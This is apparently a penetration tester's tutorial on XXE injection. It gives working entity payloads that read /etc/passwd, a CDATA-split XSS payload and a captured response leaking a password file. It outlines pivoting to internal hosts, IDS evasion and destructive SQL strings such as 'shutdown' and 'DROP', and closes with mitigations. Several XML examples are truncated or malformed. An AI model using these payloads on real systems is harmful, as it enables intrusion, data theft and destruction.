Infiltrating corporate networks using XXE injection


External entity injection is generally speaking a type of XML injection that allows an attacker to force a badly configured XML parser to "include" or "load" unwanted functionality that compromise the security of a web application. Now days is rear to find this types of security issues.  This type of attack is well documented and known since 2002.

XML external entity injection vulnerabilities arise because the XML specification allows XML documents to define entities which reference resources external to the document. XML parsers typically support this feature by default, even though it is rarely required by applications during normal usage.

An XXE (Xml eXternal Entity) attack is usually an attack on an application that parses XML input from untrusted sources using the incorrectly configured XML parser. The application may be coerced to open arbitrary files and/or TCP connections e.g. allow embedding data outside the main file into an XML document. A successful XXE Injection attack could allow an attacker to access operating file system, cause a DoS attack or inject a Javascript (e.g. perform an XSS attack).

How the XML parser works (based on W3C Recommendation 26 November 2008)

When an XML processor recognizes a reference to a parsed entity, in order to validate the document, the processor MUST include its replacement text. If the entity is external, and the processor is not attempting to validate the XML document, the processor MAY, but need not, include the entity's replacement text. If a non-validating processor does not include the replacement text, it MUST inform the application that it recognized, but did not read, the entity.

This rule is based on the recognition that the automatic inclusion provided by the SGML and Extended Markup Language (XML) entity mechanism, primarily designed to support modularity in authoring, is not necessarily appropriate for other applications, in particular document browsing. Browsers, for example, when encountering an external parsed entity reference, might choose to provide a visual indication of the entity's presence and retrieve it for display only on demand.

When an entity reference appears in an attribute value, or a parameter entity reference appears in a literal entity value, its replacement text MUST be processed in place of the reference itself as though it were part of the document at the location the reference was recognized, except that a single or double quote character in the replacement text MUST always be treated as a normal data character and MUST NOT terminate the literal.

How the XML parser handles XXE's

An XXE is meant to be converted to a Uniform Resource Identifier (URI)  reference (as defined in IETF RFC 3986), as part of the process of dereferencing it to obtain input for the XML processor to construct the entity's replacement text. It is an error for a fragment identifier (beginning with a # character) to be part of a system identifier. Unless otherwise provided by information outside the scope of this article, or a processing instruction defined by a particular application specification), relative URI's are relative to the location of the resource within which the entity declaration occurs.

This is defined to be the external entity containing the '<' which starts the declaration, at the point when it is parsed as a declaration. A URI might thus be relative to the document entity, to the entity containing the external Document Type Definition (DTD) subset, or to some other external parameter entity. Attempts to retrieve the resource identified by a URI may be redirected at the parser level (for example, in an entity resolver) or below (at the protocol level, for example, via an HTTP Location: header).
Note: A Document Type Definition defines the legal building blocks of an XML document. It defines the document structure with a list of legal elements and attributes. A DTD can be declared in line inside an XML document, or as an external reference.

In the absence of additional information outside the scope of this specification within the resource, the base URI of a resource is always the URI of the actual resource returned. In other words, it is the URI of the resource retrieved after all redirection has occurred.

An actual example of XXE

Based on what is already explained about how the XML parser handles XXE in the following example the XML document will make an XML parser read /etc/passwd and expand it into the content of the PutMeHere tag:

<?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE PutMeHere [
   <!ELEMENT PutMeHere ANY>
<!ENTITY xxe SYSTEM "/etc/passwd">
 <PutMeHere>& xxe ;</PutMeHere>

See how the ENTITY definition creates the xxe entity, and how this entity is referenced in the final line. The textual content of the PutMeHere tag will be the content of  /etc/passwd. If the above XML input is fed to a badly configured XML parser then the passwd is going to be loaded.

Note: The XML document is not valid if the &xxe is not started with the '&' character and terminated with ';' character.

Note: The attack is limited to files containing text that the XML parser will allow at the place where the External Entity is referenced. Files containing non-printable characters, and files with randomly located less than signs or ampersands, will not be included. This restriction greatly limits the number of possible target files.

Identifying XXE attack strings

The following table contains attack string that can help someone break the XML schema and cause the XML parser to return possibly verbose errors and help you identify the XML structures. 

14<![CDATA[ / ]]>

Note: CDATA section delimiters: <![CDATA[ / ]]> - CDATA sections are used to escape blocks of text containing characters which would otherwise be recognized as markup. In other words, characters enclosed in a CDATA section are not parsed by an XML parser.

Exploiting XXE vulnerabilities

Let's suppose there is a web application using an XML style communication in order to perform user login. This is done by creating and adding a new <user> node on an xmlDb file. We will try to inject an XML schema that has to do with XML login. For our example we will use the following messages. Some or all the following attempts will generate an XML error, helping as to understand the XML schema of the XMLdb.

Valid XML request:

<?xml version="1.0" encoding="ISO-8859-1"?>

Note: A valid XML request for a user log-in.

1st Example

<?xml version="1.0" encoding="ISO-8859-1"?>

Note:  Simple XML injection using an arrow character.

2nd Example

<?xml version="1.0" encoding="ISO-8859-1"?>

Note:  Simple XML injection with half malformed html comment injected.

3rd Example

<?xml version="1.0" encoding="ISO-8859-1"?>

Note:  Simple XML injection using a reverse arrow character.

4th Example

<?xml version="1.0" encoding="ISO-8859-1"?>

Note:  This sequence of characters is interpreted as the beginning/ end of a comment. So by injecting one of them in User name like that Username = user1<!-- will generate an XML message like that:


5th Example

<?xml version="1.0" encoding="ISO-8859-1"?>
  <username>user1 <![CDATA[ / ]]> </username>

Note:  Simple XXE  injection attempt. When CDATA tag is used, every character enclosed by it is not parsed by the XML parser eventually.

6th Example

<?xml version="1.0" encoding="ISO-8859-1"?>
  <username>user1<![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]> </username>

Note: XSS injected in an XML parser.Another test is related to CDATA tag. When the XML document is parsed, the CDATA value will be eliminated, so it is possible to add a script if the tag contents will be shown in the HTML page.

A more complex scenario for exploiting XXE attacks (a real attack scenario)

XXE attacks can result as already mentioned earlier into OS read file access, similar side effect  someone would say to a path traversal attack. A more complex scenario would be for us to have a sophisticated application that performs e-banking transactions and uses the browser as an end point thin client that absorbs the web service after of course a successful login. So lets assume that the transaction  XML message uses the user name and password back and forth along with XML message (yes I have seen that) in order to perform the transaction.

Client request (XML message used to perform transaction to for the client user name with password userpass1) :

<?xml version="1.0" encoding="ISO-8859-7"?>
  <fixedPayment organizationId="44" productId="61" clientId="33333333" paymentId="3"      referenceDate="2008-05-12" paymentDate="20-11-25">
        <amount currency="EUR">100,1</amount>
     <description>costumer description</description>

Explanation: All information needed for the transaction is encapsulated inside the XML message.

Server response (no XXE injection performed):

<?xml version="1.0" encoding="ISO-8859-7"?>
  <!DOCTYPE webapp SYSTEM "http://webapp.gr/app/app.dtd">
  <webapp> <status code="200" text="OK"/>
    <fixedPayment organizationId="44" productId="61" clientId=" 33333333 " paymentId="3"      paymentDate="2009-11-25" referenceDate="2008-05-12" dateCreated="2012-03-12T15:55:06"  lastModified="2012-03-12T15:55:06" >
             <amount currency="EUR" >100,1</amount>
             <description>costumer description</description>
      <paymentStatus code="14" text="Successful transaction" />

Explanation: An http 200 code is returned along with the success message for the transaction.

Client request (XML message with successful XXE injection):

<?xml version="1.0" encoding="ISO-8859-7"?><!DOCTYPE foo [<!ENTITY xxefca0a SYSTEM "file:///etc/passwd"> ]>
  <fixedPayment organizationId="44" productId="61" clientId="33333333" paymentId="1"      referenceDate="2005-05-12" paymentDate="23-11-22">
        <amount currency="EUR">100,1</amount>
     <description>costumer description</description>

Explanation: See the principal tag and the XXE after the XML version tag. The output return message is embedded along with the principal tag.  So the return message will contain/embed the passwd file along with the success or error message inside the principal tag.

Server response (with successful XXE injection performed):

HTTP/1.1 400 ???????????: ??? ??????? xxxxxxx ?? ????? ?????? username1sroot:x:0:0:MPORTAL root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync
bash xxx:x:503:503::/var/home/xxx:/bin/bash mfamar:x:504:100:xxx BE Agent:/home/mfamar:/bin/bash xxxx:x:505:505::/home/xxxx:/bin/bash xxx:x:506:506::/home/xxxx:/bin/bash jboss:x:xxx:xxx:JBossAS:/usr/share/jbossas:/bin/sh
Date: Mon, 12 Mar 2011 12:00:45 GMT
Server: Apache/xxxx (Red Hat)
Set-Cookie: JSESSIONIDSSO=xxxxxxxxxxxx; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Content-Language: en-US
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 7163
<html><head><title>Apache Tomcat/xxx - Error report</title><STYLE><!--H1{font-family : sans-serif,Arial,Tahoma;color : white;background-color : #0086b2;} H3{font-family : sans-serif,Arial,Tahoma;color : white;background-color : #0086b2;} BODY{font-family : sans-serif,Arial,Tahoma;color : black;background-color : white;} B{color : white;background-color : #0086b2;} HR{color : #0086b2;} --></STYLE> </head><body><h1>HTTP Status 400 - ???????????: ??? ??????? franchisor ?? ????? ?????? username1root:x:0:0:MPORTAL root:/root:/bin/bash
xxx:x:101:101:JBossAS:/usr/share/jbossas:/bin/sh).</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/xx.xx</h3></body></html>jboss:x:xxx:xxx:JBossAS:/usr/share/jbossas:/bin/sh).</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/x.x</h3></body></html>

Explanation:The response is an XML message that contains the passwd file of the linux box that contains the vulnerable web application. Take notice of the amber.

The attack scenario

The XXE attack described above is actually a very realistic attack scenario that I performed in one of my clients and then reproduced it in my own labs and since this article has more than 1000 page views I thought it would be a good idea to update it with more information on how someone can escalate his/her attack to become more sophisticated so here is a primitive diagram on what happened:

Note: As you can see from the vulnerable web application you can issue http requests and start looking for other web servers.

The next step would be to map the outbound local firewall rules to see what traffic is allowed to go  out. In order to do that you would have to try to access hosts that exist and reply back (e.g. perform a tcp SYN-SYN/ACK with the machine you proxy the XXE requests), so the first thing to do would be to download the host file of the compromised web server and then start forwarding traffic to these machines. As soon as you get a response back you know that the specific machine is actively responding to your http requests. Then you start rotating through all ports and identify the target machine ports replying back to you (e.g. http://replyback.com:1 then try http://replyback.com:2 and continue increasing the port number until you reach the highest port). That way you map all egress filtering done by the XXE proxy local firewall.You have to also learn the IDS/IPS threshold, unless of course you do an authorized penetration test.

You should be aware that the XML parser only returns a small chunk of the data back to you (that means that you would have to identify the OS firewall rules from short versions if the true error messages version). See the diagram below explaining the test: 

Note: The next step after mapping the local firewall rules would be to start fingerprinting the surrounding web servers by using the DirBuster directory list or further escalate and use the https to finger print the web servers based on the SSL errors returned back, and then deliver an msfpayload or perform a path traversal or SQL injection attack through the xml parser (it is not as much simple as it sounds).

Tools to use to perform this attack 

The only tools you would need to use to perform this attack would be the free version of Burp Proxy (the Burp Intruder tool and the Burp Repeater tool), openssl (e.g. issue openssl s_client -connect command), the DirBuster directory list and the fuzzdb list ( for proper ammunition). The following screenshot shows how you can do it:

 Note: See how I added the payload position and that I used the sniper mode.

Destroying surrounding machines

A malicious attacker taking advantage of this attack can actually blindly start launching database shutdown SQL injection attacks through the parser. A way to do that would be to issue a:
  1. ';shutdown --
  2. DROP sampletable;--
Note: Fingerprinting back database is also possible.

Stealing data from surrounding machines 

Another interesting thing someone can do with proxy XXE http requests is to try to identify unprotected web admin panels and file shares through for example UNC paths or syslog deamons. Imagine how interesting would be to connect to a web proxy syslog demon through 553 and try to sniff all the traffic of the network.  

More on what can you do with a successful XXE attack
  1. The attacker can use the application as a proxy, retrieving sensitive content from any web servers that the application can reach, including those running internally within the organization on private and non rout-able address space (e.g perform database web administration panel retrieval).
  2. The attacker can exploit vulnerabilities on back-end web applications,provided that these can be exploited via the URI's (e.g perform web directory brute forcing and fingerprint web servers, perform SQL Injections or path traversal attacks e.t.c).
  3. The attacker can test for open ports on back-end systems by cycling through large numbers of IP addresses and port numbers. In some cases, timing differences can be used to infer the state of a requested port. In other cases, the service banners from some services may actually be returned within the application responses. 
  4. The attacker can use the XXE vulnerable web sever to map firewall rules on other company extarnets.
  5. The attacker might be able to DoS attack internal company web server machines.
  6. The attacker might be able hide his/her traces by mixing port scans with the vulnerable web server fake tarffic generated from the XXE oubound traffic.  
Mitigation of XXE vulnerabilities

XML parser should not follow URIs to External Entities, or make it only follow known good URIs (white listed URIs). With some parsers in order someone to disable XXE must set the setExpandEntityReferences to false, but note that this doesn't do what you expect for some of the XML parsers out there.

XML external entity injection makes use of the DOCTYPE tag to define the injected entity. XML parsers can usually be configured to disable support for this tag. You should consult the documentation for your XML parsing library to determine how to disable this feature. It may also be possible to use input validation to block input containing a DOCTYPE tag.


Very simplistically speaking when an application is vulnerable to XXE then the attacker might be capable to gain access to the web server OS file system, cause DoS attack by requesting /dev/random file, an SQL injection attack or even perform an XSS attack.